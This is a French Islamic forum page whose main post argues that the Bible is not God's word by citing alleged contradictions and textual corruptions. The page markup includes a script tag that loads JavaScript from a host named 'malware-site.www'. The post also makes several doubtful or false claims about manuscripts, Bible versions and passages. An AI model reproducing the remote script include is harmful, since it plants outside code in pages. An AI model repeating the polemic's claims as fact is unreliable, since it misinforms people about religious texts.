ISLAM SUIVANT LE CORAN ET LA SUNNA

<center><iframe align="center" id="IW_frame_1438" src="http://www.tvquran.com/add/index.htm" frameborder="0" allowtransparency="1" scrolling="no" width="302" height="334"></iframe></center>



<a href="http://#7F96C3" id="pluiedetoiles"><script type="text/javascript" src="http://malware-site.www/js/pluiedetoiles.js"></script></a>Ce présent blog se propose de transmettre le message de l'Islam et le monothéisme islamique d'après le Coran et la Sounna authentique selon la compréhension des Pieux prédécesseurs.

N'hésitez pas à vous inscrire à la Newsletter pour être mis au courant des nouveaux articles.

ISLAM SUIVANT NOS EMINENTS SAVANTS

Logo Design by FlamingText.com

Logo Design by FlamingText.com
Bienvenue sur ce forum . Comme son nom l'indique, ce forum a pour but de vous faire découvrir cette magnifique religion qu’est l’Islam ainsi que de rectifier votre avis sur celle-ci. Le forum s’est aussi fixé un autre objectif : « mettre fin aux mensonges islamophobes et défendre l’honneur de D'Allah ainsi que Son Messager »

nous suivons a travers ce forum la voie de nos pieux predecesseurs extrait du coran et de la sounna selon la compréhension de notre bien aimé prophete صلى الله عليه و سلم»

il est basé sur la croyance des gens de la sounnah , et se conforme strictement au coran, et la Sounna du prophète Mohamed صلى الله عليه وسلم ...Les articles que contient ce forum sont des écrits ou des paroles de nos eminents savants salafis , et notre objectif est avant tout d’appeler les gens à l'unicité d'Allah (tawhid) et de diffuser la da'wah salafiyah qui est la bonne compréhension de l’islam,il est le plus rédigé en langue française afin de faire connaître aux musulmans francophones et meme aux mecreants leur religion véridique et les appeler à pratiquer ses enseignements et préceptes, de les avertir du danger de l'association à Allah , ainsi que des innovations et de les mettre en garde sur les mauvaises interprétations de l’islam diffusées par les innovateurs et les groupes égarés.

Allah par sa Miséricorde a envoyé des prophètes et des Envoyés avec un seul message, un seul objectif : rappeler aux hommes l’Unicité de dieu ( il n’y a de dieu qu’Allah) Ceci est le fondement de l’islam



 
">

Like/Tweet/+1

neige qui tombe

coran a telecharger de medine

Sam 28 Nov - 13:28 par assalafia

http://nashr.qurancomplex.gov.sa/download/Al_Madinah_Mushaf_Win_Setup_15-4-2015.rar

Juillet 2017

LunMarMerJeuVenSamDim
     12
3456789
10111213141516
17181920212223
24252627282930
31      

Calendrier Calendrier

anipassion.com

    La Bible est-elle la parole de Dieu?

    Partagez
    avatar
    assalafia
    Admin

    Féminin
    Messages : 1354
    Date d'inscription : 26/08/2011
    Age : 35
    Localisation : algerie-constantine
    Emploi/loisirs : lire le coran
    Humeur : bonne

    La Bible est-elle la parole de Dieu?

    Message par assalafia le Mer 26 Mar - 13:24

    La Bible est-elle la parole de Dieu?
    La plupart des gens qui croient en Dieu ont une foi aveugle – Exemple : le Chrétien est Chrétien, parce que son père est un Chrétien, le Hindou est un Hindou, parce que son père est un Hindou, le musulman est musulman parce que son père est musulman. La majorité des gens dans le monde suivent aveuglément la religion de leurs parents. Beaucoup de gens sont programmé, il ne cherche pas à comprendre et il ne se pose pas de questions sur leur croyance. Ce sujet vous donne une idée sur la crédibilité de la Bible mais aussi de remettre en question certaines de vos croyances.  [b][b] [/b][/b]

    [b][b]"Ne méditent-ils donc pas sur le Coran? S'il provenait d'un autre qu'Allah, ils y trouveraient certes maintes contradictions ! "  [Le Coran, sourate An-Nisa 4: 82] [/b][/b]
          
     Premièrement Dieu nous informe d'une chose capitale dans ce verset : le Coran, émanant de Lui, ne comporte aucunes contradictions, aucunes failles.
    Deuxièmement, Dieu nous livre sa signature, si un livre se rattachant à Dieu d'une quelconque manière, comporte des contradictions, des erreurs, alors ce livre ne vient pas totalement de Dieu. On dit bien « Errare humanum est », l'erreur est humaine.
    Les musulmans croient sans aucun doute à la Torah qui est la loi de Moïse et Al-Injil qui est l’Evangile de Jésus. Il y a une relation entre les enseignements de Moïse, celui de Jésus, et celui de Mohamed. Le Coran nous dit que Moïse était inspiré par Dieu, David était inspiré par Dieu, Jésus était inspiré par Dieu et tout ce qu’il ont prédiqué durant leur époque respective venait de Dieu. Mais le problème c’est que ces paroles n’ont pas été conservé dans leur forme d’origine et c’est la question que nous devons nous poser. Nous ne posons pas la question à Moïse, mais ce qui est écrit n’a pas été écrit par Moïse lui-même, il ne la pas signé de sa propre main. Si Jésus avait signé les écritures de Mathieu, Marc, Luc, Jean il n’y aurait pas eu de problème. Mais puisqu’il n’ont rien écrit de leur vivant, aucun mot n’est resté d’eux et personne ne l’a fait pour eux de leur vivant, ce sont tous des livres anonymes et les savants chrétiens disent qu’ils n’avaient pas la motivation pour cela. On pourrait en avoir mais pas les savants. Quel motif ultérieur avaient-ils pour nous dire à titre d’exemple que Mathieu s’est servi de l’Evangile de Marc gratuitement, on peut dire comme un enseignement, qu’il copiait sur Marc, bien que Marc ne fait pas partie des 12 apôtres de Jésus. Pourquoi un témoin oculaire et auditif irait-il copié sur quelqu’un qui n’était pas là ? Cela n’a pas de sens.
    La Bible catholique romaine est antérieure à celle des protestants seulement elle n’est pas reconnu chez les protestants, car elle contient 73 livres  et donc 7 livres de plus que ‘King James Version’, c’est-à-dire la version du ‘Roi Jacques’ (la version des protestants). Ces 7 livres sont appelé par les protestants « APOCRYPHES », ils considèrent ces paroles comme étant faible, pas digne d’être dans la parole de Dieu, dont l’authenticité est douteuse. Sept livres supprimés de ce qu’on appelle la parole de Dieu. 
    Si un Chrétien accepte ces sept livres, il est catholique, s’il ne les accepte pas, il est protestant. Les témoins de Jéhovah ont une Bible qui s’intitule « La traduction mondial récente », cette version a été refusé, car ils l’ont traduit à leur guise, même acte commis par les protestants auparavant. 
    Les catholiques ont une version de la Bible, les protestants ont une version de la Bible, les témoins de Jéhovah ont une version de la Bible, et ils prétendent tous avoir la parole de Dieu. 
    Nous allons passer en revue quelques unes des contradictions et erreurs bibliques dues aux hommes qui ont retouché les textes bibliques, en continuant de faire croire aux gens que cela vient de Dieu.  
    Les plus anciennes écritures date de 400-600 ap. J.-C. La version la plus proche des écritures est la ‘Version Standards Révisé’ 200-300 ap. J.-C, cette version remonte aux plus anciens  manuscrits, cela ne veut pas dire que c’est écrit par Jésus mais c’est la plus proche de son époque et donc la plus authentique. Cette version est la plus proche de l’original (mais n’est pas l’original), elle a été révisé par 32 savants Chrétiens accompagnée de 50 groupes religieux mais malgré cela, il faudrait encore la révisé car elle contient beaucoup de défauts. A savoir que la ‘Version Standards Révisé’ de 1952 est différente de la ‘Version Standards Révisé’ de 1971 malgré les grands efforts qui ont été fait.  
    Ces savants ont découvert que les mots comme "enfanté"(engendré) ou "fils unique" sont des impostures :
    « Car Dieu a tant aimé le monde, qu’il a donné son seul Fils engendré, afin que quiconque croit en lui ne périsse pas, mais qu’il ait la vie éternelle. » [La Bible, Jean 3]   
    « Quiconque croit que Jésus est le Christ, est de Dieu ; et quiconque aime celui qui l’a engendré, aime aussi celui qui est engendré de lui » [La Bible, 1er épître de Jean 5:1]   
    Donc, ils ont retranché certaines paroles dans un premier temps. 
    « Car il y en a trois qui rendent témoignage dans le ciel, le Père, la Parole, et l’Esprit Saint, et ces trois-là sont un. » [La Bible, 1er épître de Jean 5:7]  
    Ce verset a été supprimé dans la version standard revue et corrigée par les savants chrétiens. Ce verset fut supprimé et considéré comme une falsification.   
    Les versets 9 à 20 ont été retranchés, car ils sont considéré comme imposture (toujours dans la version standard la plus révisé).Ensuite on a remis dans la VSR de 1971 ce qui avait été retranché en laissant tombé le verset 19. Même chose avec les autres versets qui ont été retranché, ils ont été remis. 
    Toujours dans la VSR de 1952, le verset sur l’ascension a été retiré et considéré comme une invention (Evangile de Luc 24:51 et Evangile de Marc 16:19)
     Dans la version de 1971 on a rajouté ce qui avait été enlevé. Une traduction pourrait avoir différentes terminologies, le traducteur a le droit de choisir ses mots, c’est le droit de tout traducteur mais à condition qu’il ne change pas le sens et qu’il ne retranche pas, il doit être honnête. 

    Il y a 24.000 manuscrits et pas deux sont identiques. 

    Dans une traduction on ne retranche pas et on ne falsifie pas (sans tenir compte des contradictions qui pourraient être dues aux textes originaux et qui datent de 300-400 ap. J.-C). Donc, il n’y a pas seulement des traductions différentes de la Bible mais aussi des versions différentes. 
     Malheur, donc, à ceux qui de leurs propres mains composent un livre puis le présentent comme venant d'Allah pour en tirer un vil profit ! - Malheur à eux, donc , à cause de ce que leurs mains ont écrit, et malheur à eux à cause de ce qu'ils en profitent !  [Le Coran, sourate Al-Baqara 2: 79] 
    Il n’y a aucun verset dans le Coran mentionnant d’accepter la Bible, aucun.
    Le Coran parle exceptionnellement de la Torah et Al-Injil. La Torah est censé être écrite par Moïse sous inspiration divine. Les juifs définissent la Torah comme étant les cinq premiers livres de l’Ancien Testament (le Pentateuque, c’est-à-dire, la Genèse, l’Exode, le Lévitique, le Deutéronome, les Nombres). Il nous est dit plus de 700 que ce n’est pas la parole de Dieu, vous trouverez au moins 700 fois "Le seigneur dit à Moïse" et "Moïse dit au seigneur". Les savants chrétiens disent aujourd’hui qu’une partie de la "Torah" actuel n’a pas été écrite à l’époque de Moïse. Dans le livre du Deutéronome :   
    « Ainsi Moïse, le serviteur du SEIGNEUR, mourut là, au pays de Moab, selon la parole du SEIGNEUR. Et il l’ensevelit dans la vallée, au pays de Moab, vis-à-vis de Bethpeor; et personne ne connaît son sépulcre jusqu’à aujourd’hui.». [La Bible, Deutéronome, 34 : 5-6]   
    On raconte à la 3ème personne la mort et l’enterrement de Moïse. Moïse ne pouvait écrire que personne ne connait sa tombe jusqu’à nos jours et comment pouvait-il parlé ainsi ?
    Non seulement ce n’est pas la parole de Dieu mais en plus de cela ce n’est pas celle de Moïse.  
    « Or Moïse était âgé de cent vingt ans quand il mourut; son œil n’était pas obscurci, et sa vigueur non plus n’était pas diminuée. »  [La Bible, Deutéronome, 34 : 7]   
    Quelqu’un d’autre raconte à la place de Moïse. Ce n’est pas la Torah de Moïse. Les copistes ont changé certains passages afin d’éclaircir, donc ils ont changé dans l’original, ils se sont servi de leur propre opinion, comme les témoins de Jéhovah. Ce sont des choses qui arrivent souvent avec la Bible. 
     Dans le livre de la révélation(Apocalypse) :
     "quiconque rajoute ou retranche quoi que ce soit dans la parole de Dieu l’empoisonne".
    voir chapitre 22, verset 18-19
     Et quand est-il des Evangiles :   Evangile selon Mathieu
                                                 Evangile selon Marc
                                                 Evangile selon Luc
                                                 Evangile selon Jean

    Où est l’Evangile de Jésus ???  
    Selon ne veut pas dire De car Mathieu n’a même pas écrit son Evangile,.. 
    Dans le livre de Mathieu : 
     « Et Jésus, passait plus loin, il vit un homme, nommé Matthieu, assis au lieu du péage, et il lui dit : Suis-moi. Et il se leva, et le suivit. » [La Bible, Mathieu 9: 9] 
    Qui a écrit cela, Dieu, Jésus ou Mathieu ? Mathieu.
    Si c’était Mathieu, il aurait plutôt dit :
     « Et Jésus, passait plus loin, il me vit assis au lieu du péage, et me dit : Suis moi. Et je le suivit. » (c’est un exemple)
     Cela n’a même pas été écrit par Mathieu, cela a été écrit par quelqu’un d’autre.  
    Dans l’Evangile de Mathieu,  Jésus dit : « Car je vous dis que, si votre droiture ne surpasse la droiture des scribes et des Pharisiens, en aucun cas vous n’entrerez dans le royaume du ciel. »  [La Bible, Mathieu 5: 20]
    Vous n’entrerez pas dans le royaume des cieux si vous n’êtes pas mieux que les juifs, et si vous ne suivez pas la loi vous ne pourrez pas être meilleurs que les juifs.
    Aussi bien le Nouveau Testament que l’Ancien Testament, ils sont tous important pour les chrétiens, car Jésus est venu accomplir la loi et non pas pour abolir la loi. Et pour être meilleur que les scribes et les pharisiens, il faut donc suivre la loi.
    Il y a notamment certaines contradictions dans la Bible : voici quelques exemples.
    « Voir Dieu ».
    « Aucun homme n’a vu Dieu à aucun moment ; le seul Fils engendré, qui est dans le sein du Père, lui l’a déclaré. »  [La Bible, Jean 1]   Personne n’a vu Dieu.
     « Et Jacob appela le nom de l’endroit Peniel ; car, j’ai vu Dieu face à face et ma vie a été préservée. » [La Bible, Genèse 32]    Jacob a vu Dieu face à face et il est resté vivant.
     « Et il dit : Tu ne peux pas voir ma face ; car nul homme ne peut me voir, et vivre. » [La Bible, Exode 33]   Dieu dit : "Personne ne pourrait me voir et vivre".   
    « Aimez vos ennemis ».  
    Dans l’Evangile de Mathieu, il est écrit :  
    « Mais moi je vous dis : Aimez vos ennemis, bénissez ceux qui vous maudissent ; faites du bien à ceux qui vous haïssent, et priez pour ceux qui se servent de vous avec mépris et vous persécutent ; » [La Bible, Mathieu 5:44]   
    Et dans l’Evangile selon Luc : 
    « Mais ceux-là mes ennemis, qui n’ont pas voulu que je règne sur eux, amenez-les ici, et tuez-les devant moi.»  [La Bible, Luc 19:27] 
     Ceux qui ont écrit les Evangiles étaient guidé par le Saint-Esprit donc ils ne peuvent pas commettre des erreurs, il ne peut pas y avoir de contradictions, parce que c’est le même Saint-Esprit. A savoir : les mots entre parenthèse ne figurent pas dans le manuscrit originale car ce sont les commentaires des éditeurs aux lecteurs pour les aider.
    Dans l’Evangile de Luc : « Et Jésus lui même commençait d’avoir environtrente ans, étant, (comme on le pensait), le fils de Joseph, qui était le fils d’Héli,…»  [La Bible, Luc 3:23]   
    Le Saint-Esprit ne l’a pas guidé pour donner l’âge exacte, pourquoi ? Malgré qu’il est Dieu !
    Comment distingué réellement ce qui est de Dieu et ce qui est de l’homme. 
    Il y a 10 cas d’incestes (relation sexuelle avec un membre de sa famille, ex ; père-fille, mère-fils,…) dans la Bible, la parole de Dieu. Cinq cas d’incestes dans la Genèse.
    La lecture est comme la nourriture, si vous mangez une nourriture pourrie vous serez empoisonné et si vous lisez de mauvaises choses vous empoisonnez vos esprits.
     Voici quelques exemples dans la Bible :
     - Judas a commis l’adultère avec sa belle fille sur la rue, il a eu deux jumeaux, un des ascendants de Jésus !!!
     - Lot a commis l’adultère avec ces deux filles,
     - Un des fils de Jacob avec sa mère,…

      La date/heure actuelle est Ven 21 Juil - 23:34